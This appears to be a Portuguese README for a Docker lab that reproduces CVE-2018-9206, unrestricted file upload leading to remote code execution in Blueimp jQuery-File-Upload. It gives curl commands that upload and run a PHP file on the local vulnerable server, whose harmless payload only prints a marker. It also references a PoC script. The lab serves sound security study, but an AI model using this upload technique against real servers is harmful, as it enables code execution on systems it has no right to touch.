
Ambiente de laboratório baseado em Docker para CVE-2018-9206 (Blueimp jQuery-File-Upload, upload de arquivo irrestrito para RCE) com scripts PoC e comandos de validação.
Ambiente Docker vulnerável para CVE-2018-9206 - Upload de Arquivo Irrestrito no Blueimp jQuery-File-Upload <= 9.22.0.
docker compose up -d --build
Aplicação disponível em: http://localhost:8888/jQuery-File-Upload/
# Upload de um arquivo PHP
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
-F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'
# Executar
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Saída: CVE-2018-9206-PWNED
Ou execute o script PoC:
./scripts/poc.sh
docker compose down -v
| Campo | Valor |
|---|---|
| CVE | CVE-2018-9206 |
| Produto | Blueimp jQuery-File-Upload |
| Versão | 9.22.0 |
| Tipo | Upload de Arquivo Irrestrito → RCE |
| CVSS | 9.8 (Crítico) |